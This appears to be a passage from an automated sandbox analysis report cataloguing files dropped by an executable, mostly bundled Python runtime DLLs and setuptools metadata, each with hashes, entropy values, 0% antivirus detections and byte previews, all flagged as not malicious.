                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............j.E.j.E.j.E../E.j.E#..D.j.E#..D.j.E#..D.j.E#..D.j.E...D.j.Ez..D.j.E.j.E:j.E.j.Elj.E-..D.j.E-..D.j.ERich.j.E........................PE..d.....ac.........." ...!.....................................................0............`..........................................!..X....!...............`..8.......................T.......................(.......@............................................text............................... ..`.rdata..h#.......$..................@..@.data...8....@......................@....pdata..8....`.......:..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\libcrypto-1_1.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3429624
                                                                                                                                                                                                                            Entropy (8bit):6.093870626224665
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:6uTKuk2i4IU6ixsOjPWJJrf129Pr1+leV6E3AH/vgpdbZ/NPL0asQa1CPwDv3uF3:6XH+n9Z+1obZ/10asv1CPwDv3uFfJLx
                                                                                                                                                                                                                            MD5:63C4F445B6998E63A1414F5765C18217
                                                                                                                                                                                                                            SHA1:8C1AC1B4290B122E62F706F7434517077974F40E
                                                                                                                                                                                                                            SHA-256:664C3E52F914E351BB8A66CE2465EE0D40ACAB1D2A6B3167AE6ACF6F1D1724D2
                                                                                                                                                                                                                            SHA-512:AA7BDB3C5BC8AEEFBAD70D785F2468ACBB88EF6E6CAC175DA765647030734453A2836F9658DC7CE33F6FFF0DE85CB701C825EF5C04018D79FA1953C8EF946AFD
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.>y..P*..P*..P*v..*m.P*-.Q+}.P*-.U+t.P*-.T+w.P*-.S+{.P*k.Q+t.P*..Q*..P*).S+b.P*).T+..P*).P+~.P*).*~.P*).R+~.P*Rich..P*........PE..d.....'a.........." ......$...................................................4.......4...`.........................................@Q/..h....4.@....@4.|....@2......84......P4..O....,.8...........................P.,.8.............4..............................text...4.$.......$................. ..`.rdata..V.....$.......$.............@..@.data....z....1..,....1.............@....pdata.. ....@2.......1.............@..@.idata..^#....4..$....3.............@..@.00cfg..Q....04.......3.............@..@.rsrc...|....@4.......3.............@..@.reloc...x...P4..z....3.............@..B................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\libffi-7.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32792
                                                                                                                                                                                                                            Entropy (8bit):6.3566777719925565
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                                                                                                                                                            MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                                                                                                                                                            SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                                                                                                                                                            SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                                                                                                                                                            SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\libssl-1_1.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):695032
                                                                                                                                                                                                                            Entropy (8bit):5.528361289023932
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:EwIGh2Hjnl6uk51iNXuAX7TBElV57sldbeMR29XxSNreSZYrRnU2lvzsT:Uk51iNZyMR+keSZ6U2lvzsT
                                                                                                                                                                                                                            MD5:BD857F444EBBF147A8FCD1215EFE79FC
                                                                                                                                                                                                                            SHA1:1550E0D241C27F41C63F197B1BD669591A20C15B
                                                                                                                                                                                                                            SHA-256:B7C0E42C1A60A2A062B899C8D4EBD0C50EF956177BA21785CE07C517C143AEAF
                                                                                                                                                                                                                            SHA-512:2B85C1521EDEADF7E118610D6546FAFBBAD43C288A7F0F9D38D97C4423A541DFAC686634CDE956812916830FBB4AAD8351A23D95CD490C4A5C0F628244D30F0A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&v..G.^.G.^.G.^.?.^.G.^.2._.G.^.,._.G.^.2._.G.^.2._.G.^.2._.G.^.2._.G.^.G.^HF.^.2._.G.^.2._.G.^.2.^.G.^.2._.G.^Rich.G.^........................PE..d.....'a.........." .....8...L......<.....................................................`.........................................p+...N..HE..........s........K...~..........l.......8...............................8............0..H............................text....6.......8.................. ..`.rdata..z)...P...*...<..............@..@.data...QM.......D...f..............@....pdata...T.......V..................@..@.idata..PW...0...X..................@..@.00cfg..Q............X..............@..@.rsrc...s............Z..............@..@.reloc..]............b..............@..B................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\mfc140u.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6065952
                                                                                                                                                                                                                            Entropy (8bit):6.6463891622960976
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:Z+Uw5pDgPAnxE5I0UEjmCfK+KvqvH+K26AnLzYJMKDBONlPElQPcukuSwIbFLOAB:wc1AnqGnEuoFLOAkGkzdnEVomFHKnPg
                                                                                                                                                                                                                            MD5:639DB7FE67E2E15D069A62C0EF4A971C
                                                                                                                                                                                                                            SHA1:BDBF2517678F9066C4553E6FDACE0A366929185C
                                                                                                                                                                                                                            SHA-256:760308CF8BEDAEBC4500049622D08DDCACA0024ACBD3B6BDCA1618EC48A91597
                                                                                                                                                                                                                            SHA-512:83CD3E89DDAC3915686BCEEC25654F0A35FE66A1C27D95BCFD3B44BDC01DED0DF9BEB525E0604522F61D58183546AF63FFDD60F90E5BFFD648774169832D2335
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........Y.J.7.J.7.J.7..2..K.7..2.K.7..2.H.7..2.._.7.C...^.7.q.6.H.7.q.3.F.7.q.2.\.7..2..Y.7.J.6.J.7.q.4.L.7.q.>...7.q.7.K.7.q..K.7.q.5.K.7.RichJ.7.........................PE..d....Z.........." .....R0...,..............................................0]......J]...`A........................................@.A.......A...... F.......C..O...P\. ?....[..o.. t5.8...................Xt5.(....u1..............p0.P.....@......................text....P0......R0................. ..`.rdata..B....p0......V0.............@..@.data...pi...@B...... B.............@....pdata...O....C..P....B.............@..@.didat..H.....F......@E.............@....tls..........F......FE.............@....rsrc........ F......HE.............@..@.reloc...o....[..p....Z.............@..B........................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\pyexpat.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):204008
                                                                                                                                                                                                                            Entropy (8bit):6.323651054294958
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:p+xM8Or2rtNSC77HnjHkiKyeRjqaLWv6m:0IrijeHEv3
                                                                                                                                                                                                                            MD5:801D35409FEC61CE6852E3540889C9C7
                                                                                                                                                                                                                            SHA1:A3C7E44433EBFEF5359D12B9AC2F64782CCFF3E9
                                                                                                                                                                                                                            SHA-256:AB0814B19FD6B10D2729A907CF449F8A858A42B3F1288FB1C93B62950059295D
                                                                                                                                                                                                                            SHA-512:D1F81469D1407B42C7AA207013C79D393ED8F598C9CF1F9D2BF3419FF82C2CD4817A5360D0AF963BFD45D28F8ADCEDEB54701D56B06F4C0F96DAA92DFEC755D0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ab..%..J%..J%..J,{:J)..Jwv.K'..Jwv.K)..Jwv.K-..Jwv.K&..J.v.K'..J1h.K&..J%..JQ..J.v.K!..J.v.K$..J.vVJ$..J.v.K$..JRich%..J................PE..d...a>-a.........." ................d........................................0......@W....`.........................................0...P.................................... .......V..T............................V..8............@...............................text....,.......................... ..`.rdata..*....@.......2..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\python3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):59624
                                                                                                                                                                                                                            Entropy (8bit):5.908791493600186
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:An+mYEBMcEfpzVHBlAUcfc0la6Wc6kH/ZFJ1Yu+wNBECaOMyCgUhkb0E/GdlI8Bw:A+mYEBMofwkYlI8B0KyzyO
                                                                                                                                                                                                                            MD5:D188E47657686C51615075F56E7BBB92
                                                                                                                                                                                                                            SHA1:98DBD7E213FB63E851B76DA018F5E4AE114B1A0C
                                                                                                                                                                                                                            SHA-256:84CB29052734EC4AD5D0EAC8A9156202A2077EE9BD43CABC68E44EE22A74910A
                                                                                                                                                                                                                            SHA-512:96CA8C589AB5DB5FDE72D35559170E938CE283559B1B964C860629579D6A231E1C1A1952F3D08A8AF35D1790228AC8D97140B25B9C96D43F45E3398459AE51BC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............d...d...d.|.l...d.|.d...d.|.....d.|.f...d.Rich..d.........................PE..d...K>-a.........." .................................................................2....`.........................................` ..<............................................ ..T............................................................................text............................... ..`.rdata....... ......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\python39.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4488424
                                                                                                                                                                                                                            Entropy (8bit):6.438282060738091
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:yV2AZJ2D90f3gXG9Fo6fxOWzB/um/1S3pWiN9vXWYv4AvGi1r/onEHcPaRryThwk:ugD9cRVo3IkaeBmn3qCHDMo9wQ
                                                                                                                                                                                                                            MD5:7E9D14AA762A46BB5EBAC14FBAEAA238
                                                                                                                                                                                                                            SHA1:A5D90A7DF9B90BDD8A84D7DC5066E4EA64CEB3D9
                                                                                                                                                                                                                            SHA-256:E456EF44B261F895A01EFB52D26C7A0C7D7D465B647A7B5592708EBF693F12A3
                                                                                                                                                                                                                            SHA-512:280F16348DF1C0953BBC6F37FF277485351171D0545EBE469BACD106D907917F87584154AEC0F193F37322BC93AC5433CD9A5B5C7F47367176E5A8B19BBD5023
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................x..............g.....g.....g......g.....Rich...................PE..d...=>-a.........." .....X#...#......a.......................................@G......EE...`.........................................0.<.......=.|.....F......pD..0...`D.......F..u....$.T.............................$.8............p#.p............................text....W#......X#................. ..`.rdata...@...p#..B...\#.............@..@.data.........=.......=.............@....pdata...0...pD..2....A.............@..@.rsrc.........F.......C.............@..@.reloc...u....F..v....C.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\pythoncom39.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):556544
                                                                                                                                                                                                                            Entropy (8bit):6.0220816050985535
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:IH10c9/Km/1LDOV+4j71vzdJ1vNreqpd29ydV:IH+c9/Km/1DOVvj7h5J1g1Q7
                                                                                                                                                                                                                            MD5:70BC8ED8D8010F70EAC573ACB2DA9102
                                                                                                                                                                                                                            SHA1:0EB61A4B1542560688D74C8242F51F6E4D0FB845
                                                                                                                                                                                                                            SHA-256:9B3D25EB5B8CD86DAC4B6301DF30C2A9B9815732E52B6D8E96BF58A6AD988A84
                                                                                                                                                                                                                            SHA-512:C110716018FECE63EFDB1956EB4A200A74C47F56819E4C112408CF62A50D4F2F325BA8F9C88B91D2824FE6EC1760CC5BC1A63B12DC13A757715101C4B67CCA79
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9y.^9y.^9y.^0.[^3y.^.'._;y.^.'._;y.^.'._-y.^.'._1y.^.'._;y.^J.._4y.^..._;y.^J.._0y.^9y.^kx.^.'._hy.^.'._8y.^.'._8y.^Rich9y.^........PE..d.....a.........." .....H...2......d8.......................................p............`.............................................<c..Li.......@..\.......4q...........P..`.......T...........................@................`...............................text....G.......H.................. ..`.rdata...4...`...4...L..............@..@.data............h..................@....pdata..4q.......r..................@..@.gfids..4....0.......Z..............@..@.rsrc...\....@.......\..............@..@.reloc..`....P.......`..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\pywintypes39.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):142336
                                                                                                                                                                                                                            Entropy (8bit):5.98142112850941
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:ZZsVDfSemr2vGYrrC0MpJCM6g1cbc7SqT/2mCGIpGX:/s55i2uYrrC0qCA1cbc7S+/2mIO
                                                                                                                                                                                                                            MD5:7FDA0690544AC0051F53ADEFDB079C6A
                                                                                                                                                                                                                            SHA1:3D4A20D7B76C3352D3F6B3CDDAD232D823048152
                                                                                                                                                                                                                            SHA-256:4DCDC4F5E684D0C031122515B4F089E33DC0CC9869EF1AB65832AC90CF428906
                                                                                                                                                                                                                            SHA-512:FEDC45635B8977FA7BFF36659E34E8CD21686CCB8AF93AD4B5FA77C8ED02D54210442CCD6479B939B1E928EF1BDC0C9C73FB4DD637E9D4C4D9D88442C49D4A07
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V.V.7...7...7...O+..7...i...7..b....7...i...7...i...7...i...7...U...7..f^...7...U...7...7...7..Vi...7..Vi...7..Vi...7..Rich.7..........PE..d.....a.........." .........@............................................................`......................................... ....H.. ........`..d....0...............p.......h..T...........................Pi..................p............................text............................... ..`.rdata..^...........................@..@.data....1.......0..................@....pdata.......0......................@..@.gfids..4....P......."..............@..@.rsrc...d....`.......$..............@..@.reloc.......p.......(..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\select.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):28904
                                                                                                                                                                                                                            Entropy (8bit):6.18939704919296
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:3YyAU126JwhQHqJ8PzlI8mG6DG4yj4ZhH1K:T86WhQKJ8PzlI8mG+yjE1K
                                                                                                                                                                                                                            MD5:F8F5A047B98309D425FD06B3B41B16E4
                                                                                                                                                                                                                            SHA1:2A44819409199B47F11D5D022E6BB1D5D1E77AEA
                                                                                                                                                                                                                            SHA-256:5361DA714A61F99136737630D50FA4E975D76F5DE75E181AF73C5A23A2B49012
                                                                                                                                                                                                                            SHA-512:F0A96790FCDABF02B452F5C6B27604F5A10586B4BF759994E6D636CC55335026631FA302E209A53F5E454BEA03B958B6D662E0BE91FA64CE187A7DC5D35A9AA9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f ...N...N...N.......N..rO...N..rK...N..rJ...N..rM...N..rO...N..lO...N...O...N..rC...N..rN...N..r....N..rL...N.Rich..N.........................PE..d...W>-a.........." ....."...4............................................................`.........................................@R..L....R..x............p..T....T..........D....B..T...........................0C..8............@..(............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data........`.......B..............@....pdata..T....p.......D..............@..@.rsrc................H..............@..@.reloc..D............R..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\INSTALLER

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:pip.

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\LICENSE

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1050
                                                                                                                                                                                                                            Entropy (8bit):5.072538194763298
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:1rmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:1aJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                            MD5:7A7126E068206290F3FE9F8D6C713EA6
                                                                                                                                                                                                                            SHA1:8E6689D37F82D5617B7F7F7232C94024D41066D1
                                                                                                                                                                                                                            SHA-256:DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
                                                                                                                                                                                                                            SHA-512:C9F0870BC5D5EFF8769D9919E6D8DDE1B773543634F7D03503A9E8F191BD4ACC00A97E0399E173785D1B65318BAC79F41D3974AE6855E5C432AC5DACF8D13E8A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTW

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\METADATA

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4908
                                                                                                                                                                                                                            Entropy (8bit):5.0861617176323435
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:DpsYyJAm4a113Nr1uCDIGSwMHodIDvVnddPnzQDiHNU4o7POX7FwTtPMk:dQdrMYIGSwMHodIDvBdBn77FwTJ
                                                                                                                                                                                                                            MD5:36BE36BE5EC1F5B5843A30038F034434
                                                                                                                                                                                                                            SHA1:B903344823DBD9176774D5EA17F8513C3C8CFF01
                                                                                                                                                                                                                            SHA-256:518DD6D71AC1743D85CE3CD8C692A58611340BC4A55DDEE4D0DF1C0921D613D5
                                                                                                                                                                                                                            SHA-512:509B79F3DD004A4C4B12CE16271CF89BD2AEAEBFA48F862922D650AF469F80599C305FE185B9AA6A7A129427A0BD293B085587624E4A7EA799393101B1B6E2C6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: setuptools.Version: 57.4.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.License: UNKNOWN.Project-URL: Documentation, https://setuptools.readthedocs.io/.Keywords: CPAN PyPI distutils eggs package management.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.6.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requires-Dist: sphinx ; extra == 'doc

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\RECORD

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):23074
                                                                                                                                                                                                                            Entropy (8bit):5.583292444620482
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:pJzrUuSogahtaPEkNcFEU2H4gcWmdcYctX6YruUtWD3y2jhZfP1zH9L1:pvx+FyUtMi2j7VH9L1
                                                                                                                                                                                                                            MD5:5E77770432402B1D23A7BF643665037E
                                                                                                                                                                                                                            SHA1:CA12200EBBD580A289437EFCB69180677A53771D
                                                                                                                                                                                                                            SHA-256:6018574D28C265E89C14C3BF47DA17E4A035A1E36DEF321280F7ED4EA0E29394
                                                                                                                                                                                                                            SHA-512:D3592EA0775BDE8783472C04E0C8385D983D3FE878DF3D5A905C329C4CD9761A17B2C6A5050CBFE1C6685FBC5D2F3A5BAA5B7532A9AC1DD9536795EA488917C6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:_distutils_hack/__init__.py,sha256=X3RUiA6KBPoEmco_CjACyltyQbFRGVUpZRAbSkPGwMs,3688.._distutils_hack/__pycache__/__init__.cpython-39.pyc,,.._distutils_hack/__pycache__/override.cpython-39.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=fqf_7z_ioRfuEsaO1lU2F_DX_S8FkCV8JcSElZo7c3M,152..pkg_resources/__init__.py,sha256=P3PNN3_m8JJrYMp-i-Sq-3rhK5vuViqqjn1UXKHfe7Q,108202..pkg_resources/__pycache__/__init__.cpython-39.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-39.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-39.pyc,,..pkg_resources/_vendor/__pycache__/pyparsing.cpython-39.pyc,,..pkg_resources/_vendor/appdirs.py,sha256=MievUEuv3l_mQISH5SF0shDk_BNhHHzYiAPrT3ITN4I,24701..pkg_resources/_vendor/packaging/__about__.py,sha256=PNMsaZn4UcCHyubgROH1bl6CluduPjI5kFrSp_Zgklo,736..pkg_resources/_vendor/packaging/__init__

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\WHEEL

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                            Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlViHoKKjP+tPCCfA5S:RtBMwlViQWBBf
                                                                                                                                                                                                                            MD5:11AA48DBE7E7CC631B11DD66DC493AEB
                                                                                                                                                                                                                            SHA1:249FDB01AD3E3F71356E33E1897D06F23CFB20C2
                                                                                                                                                                                                                            SHA-256:3AA464174798E461ECB0CA2B16395B4C8AB4EF6BE91E917AD1F21003A952F710
                                                                                                                                                                                                                            SHA-512:EDD5892C9B2FE1F2439C53D2CD05F4478EC360885054BD06AFCF7936F6D066377FEE07796DAE9ECDF810E3D6100E039CAD48F00AD0E3145693D53E844CC5319D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.36.2).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\setuptools-57.4.0.dist-info\entry_points.txt

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
